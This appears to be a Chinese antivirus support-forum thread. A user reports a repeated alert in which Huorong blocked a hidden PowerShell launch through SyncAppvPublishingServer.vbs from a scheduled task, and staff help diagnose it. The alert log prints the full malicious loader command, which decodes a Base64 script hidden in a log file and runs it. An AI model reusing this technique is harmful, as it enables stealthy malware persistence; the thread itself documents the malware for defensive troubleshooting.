火绒安全软件

标题: SyncAppvPublishingServer.vbs触犯敏感动作防护规则, 已阻止 [打印本页]

作者: samui 时间: 2025-3-1 07:45
标题: SyncAppvPublishingServer.vbs触犯敏感动作防护规则, 已阻止
每次开机都会弹窗

防护项目：隐藏执行PowerShell
执行文件：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行："C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; $a=Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block}
操作结果：已阻止
进程ID：9844
操作进程：C:\Windows\System32\SyncAppvPublishingServer.vbs
操作进程命令行：C:\WINDOWS\System32\WScript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "n; $a=Get-Content C:\Windows\logs\system-logs.txt" | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block
父进程ID：2872
父进程：C:\Windows\System32\svchost.exe
父进程命令行：C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s Schedule

已经用专杀和杀毒全盘扫描过，无异常。

作者: 火绒运营专员 时间: 2025-3-1 09:36
您好，麻烦您导出火绒的安全日志，本地确认下。

作者: samui 时间: 2025-3-1 09:51
日志已上传。

日志.zip

2.51 KB, 下载次数: 2, 下载积分: 金钱 -1

作者: 火绒运营专员 时间: 2025-3-1 10:16

samui 发表于 2025-3-1 09:51
日志已上传。

您好，看日志您是使用的自定义和快速扫描，建议您使用全盘扫描后重启电脑再看下是否还有问题呢？

作者: samui 时间: 2025-3-1 13:03

火绒运营专员发表于 2025-3-1 10:16
您好，看日志您是使用的自定义和快速扫描，建议您使用全盘扫描后重启电脑再看下是否还有问题呢？ ...

已全盘扫描，未见异常，依然跳窗。

日志2.zip

1.12 KB, 下载次数: 1, 下载积分: 金钱 -1

作者: 火绒运营专员 时间: 2025-3-1 13:05

samui 发表于 2025-3-1 13:03
已全盘扫描，未见异常，依然跳窗。

您好，麻烦您提供下C:\Windows\System32\SyncAppvPublishingServer.vbs文件，我们本地分析下。

作者: samui 时间: 2025-3-1 13:09

火绒运营专员发表于 2025-3-1 13:05
您好，麻烦您提供下C:\Windows\System32\SyncAppvPublishingServer.vbs文件，我们本地分析下。 ...

相关文件已上传。

SyncAppvPublishingServer.zip

23.27 KB, 下载次数: 3, 下载积分: 金钱 -1

作者: 火绒运营专员 时间: 2025-3-1 13:11

samui 发表于 2025-3-1 13:09
相关文件已上传。

好的，收到~

作者: 火绒运营专员 时间: 2025-3-1 14:44
您好，需要提供SyncAppvPublishingServer.vbs文件，麻烦您再找下，您附件提供的是exe。

作者: samui 时间: 2025-3-1 14:50

火绒运营专员发表于 2025-3-1 14:44
您好，需要提供SyncAppvPublishingServer.vbs文件，麻烦您再找下，您附件提供的是exe。 ...

相关文件已上传。

SyncAppvPublishingServer2.zip

915 Bytes, 下载次数: 1, 下载积分: 金钱 -1

作者: 火绒运营专员 时间: 2025-3-1 14:53

samui 发表于 2025-3-1 14:50
相关文件已上传。

好的，我们分析确认下。

作者: 火绒运营专员 时间: 2025-3-1 16:11

samui 发表于 2025-3-1 13:09
相关文件已上传。

您好，此文件本地分析未发现恶意行为，麻烦您提供这三个文件，我们本地需要再确认下是否误报导致
C:\ProgramData\Huorong\Sysdiag（需要显示隐藏文件或者直接复制路径即可）
log.db、log.db-shm、log.db-wal

作者: samui 时间: 2025-3-1 16:25

火绒运营专员发表于 2025-3-1 16:11
您好，此文件本地分析未发现恶意行为，麻烦您提供这三个文件，我们本地需要再确认下是否误报导致
C:\Prog ...

相关文件已上传。

log.zip

14.96 KB, 下载次数: 1, 下载积分: 金钱 -1

作者: 火绒运营专员 时间: 2025-3-1 16:28

samui 发表于 2025-3-1 16:25
相关文件已上传。

好的，我们分析下，感谢您的反馈。

作者: samui 时间: 2025-3-1 16:30
https://bbs.huorong.cn/forum.php?mod=viewthread&tid=139261&highlight=SyncAppvPublishingServer.vbs
https://bbs.huorong.cn/forum.php?mod=viewthread&tid=99532&highlight=SyncAppvPublishingServer.vbs

我看之前就有过相同的问题，是否可以参考一下当时是怎么解决的？

作者: 火绒运营专员 时间: 2025-3-4 09:44
楼主您好，麻烦您提供下C:\Windows\logs\system-logs.txt文件，该文件隐私存在风险，我们分析确认下。

作者: samui 时间: 2025-3-4 10:27

火绒运营专员发表于 2025-3-4 09:44
楼主您好，麻烦您提供下C:\Windows\logs\system-logs.txt文件，该文件隐私存在风险，我们分析确认下。 ...

相关文件已上传。

system-logs.zip

185.06 KB, 下载次数: 1, 下载积分: 金钱 -1

作者: 火绒运营专员 时间: 2025-3-4 10:29

samui 发表于 2025-3-4 10:27
相关文件已上传。

好的，收到~

作者: 火绒运营专员 时间: 2025-3-4 13:24
您好，麻烦您到计算机管理-任务计划程序中找一下是否有相关的计划任务C:\Windows\System32\SyncAppvPublishingServer.vbs，有的话也删除一下，然后重启电脑，再看看是否还有系统加固的提示，问题未解决的话麻烦您留个QQ协助您处理下。

作者: samui 时间: 2025-3-4 14:25

火绒运营专员发表于 2025-3-4 13:24
您好，麻烦您到计算机管理-任务计划程序中找一下是否有相关的计划任务C:\Windows\System32\SyncAppvPublish ...

3月2日，windows安全中心自动清除了一个病毒，已经不再弹窗。

作者: 火绒运营专员 时间: 2025-3-4 14:26

samui 发表于 2025-3-4 14:25
3月2日，windows安全中心自动清除了一个病毒，已经不再弹窗。

好的，感谢您的反馈，后续有问题您再联系我们~

欢迎光临火绒安全软件 (https://bbs.huorong.cn/)